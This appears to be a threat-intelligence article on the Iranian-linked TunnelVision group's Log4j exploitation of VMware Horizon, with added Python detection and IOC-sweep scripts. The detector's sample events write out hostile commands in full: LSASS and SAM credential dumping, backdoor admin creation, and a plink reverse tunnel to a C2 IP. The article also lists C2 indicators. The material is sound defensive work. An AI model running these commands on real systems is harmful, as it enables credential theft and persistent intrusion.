Iranian Hackers Use Log4j Vulnerability in VMware Horizon to Spread Ransomware.

According to SentinelOne researchers Amitai Ben Shushan Ehrlich and Yair Rigevsky, “TunnelVision actions are characterised by widespread exploitation of 1-day vulnerabilities in target regions, with intrusions spotted in the Middle East and the United States.”

TunnelVision’s activities in target regions are characterised by widespread exploitation of one-day vulnerabilities. We’ve seen widespread exploitation of Fortinet FortiOS (CVE-2018-13379), Microsoft Exchange (ProxyShell), and most recently Log4Shell during the time we’ve been watching this actor. Fast Reverse Proxy Client (FRPC) and Plink are the tunnelling tools most widely used by the organisation.

  • SentinelLabs has been monitoring the activities of a threat actor with Iranian ties operating in the Middle East and the United States.
  • We’ve called this cluster of activity TunnelVision because of the threat actor’s extensive dependence on tunnelling tools and the unique way it chooses to widely deploy them.
  • TunnelVision’s operations were linked to the distribution of ransomware, making the group a potentially damaging actor, similar to other Iranian threat actors active in the region recently.

Most of the “online” (hands-on-keyboard) activity was carried out through a PowerShell backdoor, which appears to be a modified version of a public PowerShell one-liner.

Among those activities were:

  • Execution of recon commands.
  • Creation of a backdoor user and adding it to the administrators group.
  • Credential harvesting using Procdump, SAM hive dumps and comsvcs MiniDump.
  • Download and execution of tunneling tools, including Plink and Ngrok, used to tunnel RDP traffic.
  • Execution of a reverse shell utilizing VMware Horizon NodeJS component[1,2].
  • Internal subnet RDP scan using a publicly available port scan script.

Throughout the activity, the threat actor hosted payloads in a GitHub repository called “VmWareHorizon” under an account it owned, using the name “protections20”.

Exploitation of Log4j in VMware Horizon shows up as malicious processes spawned from the Horizon Tomcat service, ws_TomcatService.exe (C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe). In normal operation that service does not spawn shells, so child processes of ws_TomcatService.exe such as PowerShell, cmd.exe, rundll32.exe or tunnelling binaries are the natural detection pivot.
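The post-exploitation activities listed above (backdoor user creation, comsvcs MiniDump and SAM hive credential dumping, Plink/Ngrok tunnelling) and the ws_TomcatService.exe parent-process pivot can be turned into simple process-creation rules. The following is an example added to this article, not SentinelLabs’ or VMware’s tooling; the event records are constructed for the example in a Sysmon Event ID 1 style, and the allowlist of legitimate Tomcat child processes is an assumption that should be baselined on your own Horizon servers.

```python
"""Flag TunnelVision-style post-exploitation on a VMware Horizon host from
process-creation events (Sysmon Event ID 1 style fields).
Example code added to this article; not SentinelLabs' or VMware's tooling.
The SAMPLE_EVENTS below are constructed for the example, not real telemetry."""
import re
from typing import Dict, List, Tuple

# The Horizon Tomcat service is the process in which Log4Shell payloads run.
HORIZON_TOMCAT = "ws_tomcatservice.exe"
# Children the service spawns legitimately. ASSUMPTION for the example:
# baseline this on real Horizon servers before deploying.
TOMCAT_ALLOWED_CHILDREN = {"conhost.exe"}

# Tunnelling tools named in the report.
TUNNEL_TOOLS = {"plink.exe", "ngrok.exe", "frpc.exe"}

# (rule name, regex over the command line) for the listed activities.
CMDLINE_RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    ("comsvcs_minidump", re.compile(r"comsvcs(\.dll)?\s*,\s*(#?24|MiniDump)", re.I)),
    ("procdump_lsass", re.compile(r"procdump.*lsass", re.I)),
    ("sam_hive_dump", re.compile(r"reg(\.exe)?\s+save\s+hklm\\(sam|system|security)", re.I)),
    ("backdoor_user_add", re.compile(r"net1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add", re.I)),
    ("admin_group_add", re.compile(r"net1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add", re.I)),
    ("powershell_encoded", re.compile(r"powershell.*\s-(e|ec|enc|encodedcommand)\s", re.I)),
]


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path (handles / and \\ separators)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(ev: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event matches, in rule order."""
    hits: List[str] = []
    image, parent = _base(ev["Image"]), _base(ev["ParentImage"])
    cmd = ev.get("CommandLine", "")
    # Anything unexpected under the Horizon Tomcat service is suspicious by itself.
    if parent == HORIZON_TOMCAT and image not in TOMCAT_ALLOWED_CHILDREN:
        hits.append("horizon_tomcat_child")
    if image in TUNNEL_TOOLS:
        hits.append("tunnel_tool")
    for name, rx in CMDLINE_RULES:
        if rx.search(cmd):
            hits.append(name)
    return hits


def detect(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """(ProcessId, matched rules) for every event that matched at least one rule."""
    results = []
    for ev in events:
        hits = analyze_event(ev)
        if hits:
            results.append((ev["ProcessId"], hits))
    return results


TOMCAT = r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"

# Constructed sample events (not real telemetry). "<base64>" stands in for an
# encoded command; the tunnelling IP is the one listed in the article's IOCs.
SAMPLE_EVENTS = [
    {"ProcessId": "4412", "ParentImage": TOMCAT, "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -e <base64>"},
    {"ProcessId": "4420", "ParentImage": TOMCAT, "Image": r"C:\Windows\System32\conhost.exe",
     "CommandLine": r"\??\C:\Windows\system32\conhost.exe 0x4"},
    {"ProcessId": "4508", "ParentImage": PS, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\temp\l.dmp full"},
    {"ProcessId": "4516", "ParentImage": CMD, "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": "net.exe user svc_backup P@ssw0rd! /add"},
    {"ProcessId": "4520", "ParentImage": CMD, "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": "net.exe localgroup administrators svc_backup /add"},
    {"ProcessId": "4530", "ParentImage": CMD, "Image": r"C:\Users\Public\plink.exe",
     "CommandLine": "plink.exe -N -R 0.0.0.0:12345:127.0.0.1:3389 user@51.89.178.210 -pw x"},
    {"ProcessId": "4540", "ParentImage": CMD, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg.exe save HKLM\SAM C:\temp\sam.hiv"},
    {"ProcessId": "4600", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for pid, hits in detect(SAMPLE_EVENTS):
        print(pid, ", ".join(hits))
```

Run over the sample, the allowlisted conhost.exe child and the notepad.exe event produce nothing, while the PowerShell child of ws_TomcatService.exe fires both the parent-process rule and the encoded-command rule. The parent-process rule is the high-confidence one; the command-line rules are noisier on admin hosts and are best scoped to servers where such commands are not expected.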

Finally, the researchers concluded that the cybersecurity firm tracks the attacks as a separate Iranian cluster, not because they are unrelated, but because there is currently insufficient data to classify them as identical to any of the aforementioned attributions.

Indicators of Compromise

Type            Indicator                          Role
Domain          www[.]microsoft-updateserver[.]cf  Command and Control (C2) Server
Domain          www[.]service-management[.]tk      Payload server
IP              51.89.169[.]198                    Command and Control (C2) Server
IP              142.44.251[.]77                    Command and Control (C2) Server
IP              51.89.135[.]142                    Command and Control (C2) Server
IP              51.89.190[.]128                    Command and Control (C2) Server
IP              51.89.178[.]210                    Command and Control (C2) Server, Tunneling Server
IP              142.44.135[.]86                    Tunneling Server
IP              182.54.217[.]2                     Payload Server
GitHub account  protections20                      Utilized to host payloads (repository “VmWareHorizon”)
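The indicators above are defanged (“[.]”) so they cannot be clicked by accident; to use them against DNS, proxy or firewall logs they have to be refanged and then matched as whole tokens, including hosts that appear with a port suffix. The following is an example added to this article, not SentinelLabs’ tooling; the indicators are the ones listed above and the log lines are constructed for the example.

```python
"""Refang the defanged IOCs from the article and sweep log lines for them.
Example code added to this article; not SentinelLabs' tooling.
SAMPLE_LOG is constructed for the example; the indicators are the listed ones."""
import ipaddress
import re
from typing import List, Tuple

# Indicators exactly as listed above (defanged), with their reported role.
DEFANGED_IOCS = {
    "www[.]microsoft-updateserver[.]cf": "Command and Control (C2) Server",
    "www[.]service-management[.]tk": "Payload server",
    "51.89.169[.]198": "Command and Control (C2) Server",
    "142.44.251[.]77": "Command and Control (C2) Server",
    "51.89.135[.]142": "Command and Control (C2) Server",
    "51.89.190[.]128": "Command and Control (C2) Server",
    "51.89.178[.]210": "Command and Control (C2) Server, Tunneling Server",
    "142.44.135[.]86": "Tunneling Server",
    "182.54.217[.]2": "Payload Server",
}


def refang(ioc: str) -> str:
    """Undo report-style defanging ([.] and hxxp) and normalise case."""
    return ioc.replace("[.]", ".").replace("hxxp", "http").lower()


def _is_ip(s: str) -> bool:
    try:
        ipaddress.ip_address(s)
        return True
    except ValueError:
        return False


IOCS = {refang(k): v for k, v in DEFANGED_IOCS.items()}
IOC_DOMAINS = {k for k in IOCS if not _is_ip(k)}

# Host-like tokens: letters, digits, dots, hyphens and the defang brackets.
# ':' and '/' are excluded on purpose so "host:port" and URLs split cleanly.
TOKEN = re.compile(r"[A-Za-z0-9.\-\[\]]+")


def sweep(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (1-based line number, matched indicator, role) for every hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        for tok in TOKEN.findall(line):
            tok = refang(tok).rstrip(".")
            if tok in IOCS:
                hits.append((n, tok, IOCS[tok]))
            else:
                # Also catch hosts under a listed domain (e.g. cdn.<listed domain>).
                for d in IOC_DOMAINS:
                    if tok.endswith("." + d):
                        hits.append((n, tok, IOCS[d]))
                        break
    return hits


# Constructed sample log lines (not real telemetry), one host talking to
# the listed C2, payload and tunnelling infrastructure plus benign noise.
SAMPLE_LOG = [
    "2022-02-17T09:58:41Z dns   horizon01 query www.microsoft-updateserver.cf A NOERROR",
    "2022-02-17T09:58:42Z proxy horizon01 CONNECT 51.89.169.198:443 200",
    "2022-02-17T10:01:07Z proxy horizon01 GET http://www.service-management.tk/run.ps1 200",
    "2022-02-17T10:05:13Z fw    horizon01 ALLOW tcp 10.0.0.5:49812 -> 51.89.178.210:22",
    "2022-02-17T10:06:00Z dns   horizon01 query www.microsoft.com A NOERROR",
]

if __name__ == "__main__":
    for n, ioc, role in sweep(SAMPLE_LOG):
        print(f"line {n}: {ioc} ({role})")
```

The port-22 connection to 51.89.178.210 in the sample is the kind of event to expect from Plink, which tunnels RDP over SSH; the proxy CONNECT to a bare IP on 443 is the C2 pattern. Both are matched as whole tokens, so a lookalike such as 51.89.169.1980 does not produce a false hit.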
